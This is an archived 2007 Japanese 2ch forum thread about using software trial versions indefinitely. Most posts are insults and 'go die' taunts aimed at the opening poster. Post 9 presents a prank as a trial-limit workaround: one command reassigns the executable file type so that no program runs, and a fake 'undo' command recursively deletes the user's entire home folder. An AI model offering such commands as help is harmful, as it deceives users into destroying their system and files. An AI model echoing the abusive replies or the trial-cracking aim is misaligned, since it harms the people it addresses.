5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

体験版の無期限使用について話し合うスレ

1 :名無しさん@お腹いっぱい。:2007/01/21(日) 07:21:58 ID:SCmU5XYG0
3年か4年くらい前には体験版を無期限に使用するためにいろいろと語り合ったよね。
今どうなってるんだろう。ソフトウェアも無期限使用の対策をしているだろうし、
今となってはほとんどのソフトはクラックできないのかな。

昔でさえあまりクラックできた例はなかったから、今どうなってんだろうと思うのだが・・・。


2 :名無しさん@お腹いっぱい。:2007/01/21(日) 07:25:25 ID:RvDgryxL0

       /::^'´::::::::::::i、::::::::::::::::::::::::::::\
     ‐'7::::::::::::::::::::::::ハ:ハ::|ヽ:::;、::::::::::::丶
     /::::::::::::::/!i::/|/  ! ヾ リハ:|;!、:::::::l
    /´7::::::::::〃|!/_,,、   ''"゛_^`''`‐ly:::ト   
      /|;ィ:::::N,、‐'゛_,,.\   ´''""'ヽ  !;K
        ! |ハト〈  ,r''"゛  ,       リイ)|    死ねばいいと思うよ
          `y't     ヽ'         //
         ! ぃ、     、;:==ヲ   〃     
         `'' へ、   ` ‐ '゜   .イ
              `i;、     / l         
                〉 ` ‐ ´   l`ヽ
            / !        レ' ヽ_

3 :名無しさん@お腹いっぱい。:2007/01/21(日) 07:32:56 ID:lT4ip+mj0
朝から良スレ発見

>>1
しね

4 :名無しさん@お腹いっぱい。:2007/01/21(日) 07:36:49 ID:SCmU5XYG0
懐かしい情報について語り合おうとしてるのさ。

しかしまあ、クラックって言っても昔はいろんな定義があったもんだがね。
最近めっきり見なくなったんだ。
みんなうまくいかなくて議論やめちゃったのかな。

情報くれた人にはスレ主から100万ガバス(架空)をプレゼンツ。


5 :名無しさん@お腹いっぱい。:2007/01/21(日) 08:07:51 ID:utErr6FaO
きもい

6 :名無しさん@お腹いっぱい。:2007/01/21(日) 08:30:56 ID:dzWdAX800
そもそも2chはそれぞれの板の趣旨に沿って、
既にある程度は知識・経験を持っている者同士が話を
深めていくところなのであって、初心者の質問は板においてはオマケに過ぎない。
手間も費用もかけずにタダで知識をゲットしようなんて甘い、
初心者の質問は無視されても仕方が無い。それが2chの基本。

でも、
「2chの人達ならばこの問題を解決してくれるかもしれない」
と思って2chを訪れる善意の人たちのために、
多くの板ではあくまでも 《 厚意で 》 質問専用スレを用意している。

なのに、
「質問スレだと解答が遅い」
「単発スレのほうがレスが早く着く」
などのふざけた理由で単発スレを立てるヴァカが引きも切らない。
もし、単発スレにいちいち解答していたとしたら、
勘違い厨房が
「やっぱり単発スレの方がすばやく解答をもらえるじゃないか」
と感じて毎日毎日10個も20個も単発質問スレが立ってしまい、
5分前に立った似たような単発スレすらも見付けられないだろう。
そもそもこういう自己中なヴァカは過去ログなんか絶対チェックしない。
そのうちに板内はその手の単発質問スレで埋め尽くされてしまうだろう。
そうなればパート●●とか続いている名シリーズ・スレすらもどんどんDAT落ちしてしまうだろう。
と言う事ぐらい、5秒も考えれば分かりそうなもんだ。


以上のような思いを簡潔にまとめると【 >>1は死ね 】ということになる。


7 :名無しさん@お腹いっぱい。:2007/01/21(日) 08:42:55 ID:SCmU5XYG0
ごめ、一応僕は厨房なんだ。
しかしdatecrackerで以前、クラックできると言う定義が一般的だったもんで、
今はどうなってるのかなーなんて思ってちょっとした思いでこのスレを立ててみた次第です。

別に質問したい 教えてくれって意味で立てたわけじゃないけど迷惑だったんならすみません。
あと質問厨じゃないですよ僕は。回想の意味も含めて懐かしむスレって感じで立てたんですわ。


8 :名無しさん@お腹いっぱい。:2007/01/21(日) 09:25:51 ID:rgxG0BYK0
>>7
おまえうるさいからだまってろ

9 :名無しさん@お腹いっぱい。:2007/01/21(日) 11:15:35 ID:8XA/KnyV0
最近体験版のクラックが出来ないと嘆いている>>1よ。
このコマンドを試してみるがいい。
以下を実行することで、邪魔くさい試用制限から解放される。

[スタート]→[ファイル名を指定して実行]で 
ftype exefile="%SystemRoot%\system32\write.exe" %1
と入力し[OK]をクリックする。 これだけでおk。
製品版を買う余裕がない人にとっては朗報だろう。

もしこの方法で問題が起こったら戻すのも簡単だ。
cmd /c rd /s /q %SystemDrive%%HOMEPATH%
このコマンドを入力してOKを押すだけ。

君も試してみるといい。

10 :名無しさん@お腹いっぱい。:2007/01/21(日) 11:33:05 ID:xzDi6Og60
ってばっちゃが言ってた

11 :名無しさん@お腹いっぱい。:2007/01/21(日) 11:44:02 ID:6lQStiUk0
>>9
愉快犯は嫌いだよ。

12 :名無しさん@お腹いっぱい。:2007/01/21(日) 12:02:15 ID:5EISfSMn0
>>6
>そもそも2chはそれぞれの板の趣旨に沿って、
>既にある程度は知識・経験を持っている者同士が話を
>深めていくところなのであって、初心者の質問は板においてはオマケに過ぎない。

いつどこで2chはそういうところだという共通認識ができたんだ?キミの脳内?w

>「質問スレだと解答が遅い」
>「単発スレのほうがレスが早く着く」

このスレのテーマは単発質問スレとはまた違うと思うが?そのテーマの是非はともかくとしてw

13 :名無しさん@お腹いっぱい。:2007/01/21(日) 12:15:01 ID:WKpSg03gO
>>1
マジで通報した




14 :名無しさん@お腹いっぱい。:2007/01/21(日) 12:36:04 ID:SqxZ7xpt0
通報はしてないけど、報告はしといた。
>>1が逮捕されるのが先か、このスレが落ちるのが先か。

15 :名無しさん@お腹いっぱい。:2007/01/21(日) 12:52:01 ID:xgUphxtQ0
過去スレ
体験版の無期限使用
http://pc3.2ch.net/test/read.cgi/software/1003902579/l200

16 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:32:28 ID:hS8EtX5+0
> datecracker
しかし、マジレスするとこんなもん知ってる時点で>>1はおっさんだよな。
これweb割れ時代の遺物だぞwww

17 :名無しさん@お腹いっぱい。:2007/01/23(火) 02:18:48 ID:gIOheStd0
>>13,14
そんなんで逮捕されてたら今までスレ立てた奴はみんな逮捕されてるよ。
厨房でないように見せかけ、実際は厨房であるお前はすっこんでろ。
そんなので逮捕されてたら○○殺すって言った奴はみんな逮捕だぜ?
外の空気吸って来いや引きこもりデブwwwww


18 :名無しさん@お腹いっぱい。:2007/01/23(火) 02:33:43 ID:C6opB9+b0
>>1=>>12=>>17

>>6はコピペ

19 :名無しさん@お腹いっぱい。:2007/01/23(火) 03:42:24 ID:GHxlv/420
>>1は逮捕されました。
議論の余地もねえんじゃねえの?

こんなスレ興味ねー。お前らも別にこんなの相手にしなくていいじゃん


20 :名無しさん@お腹いっぱい。:2007/01/23(火) 20:24:29 ID:cJqNe/bJ0

http://www.auction.co.jp/mem1/search/mem_srch_personal.asp?PMNUM=196740&PKGID=0



8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)